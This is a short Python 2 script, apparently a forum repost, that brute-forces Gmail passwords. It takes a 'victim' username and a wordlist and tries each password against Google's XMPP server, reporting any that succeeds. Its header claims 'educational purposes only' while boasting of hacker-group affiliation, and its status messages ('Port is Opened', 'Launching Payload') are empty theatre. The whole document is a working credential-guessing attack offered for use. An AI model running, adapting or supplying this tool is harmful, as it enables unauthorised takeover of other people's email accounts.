Код
#!/usr/bin/python
#Install SleekXMPP & xmpppy Modules
#Priv88888 and not for kidz -(18)
#This program is only for educational purposes only.
#Changing Description of this Script won't make you the coder ^_^ !
#Don't Attack people facebook account's it's illegal !
#If you want to HaCk into someone's account, you must have the permission of the user.
#Mauritania Attacker is not responsible.
#usage:script.py username then type wordlist file
import xmpp
import sys
import urllib,re
import time
import random
print """
#Gmail BruteForce Priv8
#We Still Da Kingz of Cyber Haterz \!/
#Coded By Mauritania Attacker
#Greetz To All Members Of AnonGhost Team ;)
#Enjoy Cracking ^__^
#usage:script.py username then type wordlist file
"""
GMAIL_ID = raw_input("Enter username of victim account : ")
password_list = raw_input("Enter the password file name: ")
password_list = open(password_list, "r")
GMAIL_ID=GMAIL_ID+"@gmail.com"
print "@Connecting To Gmail Server... "
print "~Connected to Server Successfully :D"
print "Negotiating With Gmail Protocol..."
print "Port is Opened :D"
print "\!/ Attack Has Been Started Be Patient... \!/..."
for pwd in password_list:
sys.stdout.write(".")
sys.stdout.flush()
pwd=pwd.strip('\n')
jid = xmpp.protocol.JID(GMAIL_ID)
C = xmpp.Client(jid.getDomain(), debug=[])
if C.connect(('talk.google.com',5222)):
print "~~Launching Payload~~"
else:
print "[+]Enj0y wkwkwkw[+]"
print pwd
if C.auth(jid.getNode(), pwd):
C.sendInitPresence()
print "Gmail Successfully ^_* "," Password Found ==> : ",pwd
print "GreetZ To AnonGhost Team \!/"
C.disconnect()
time.sleep(2)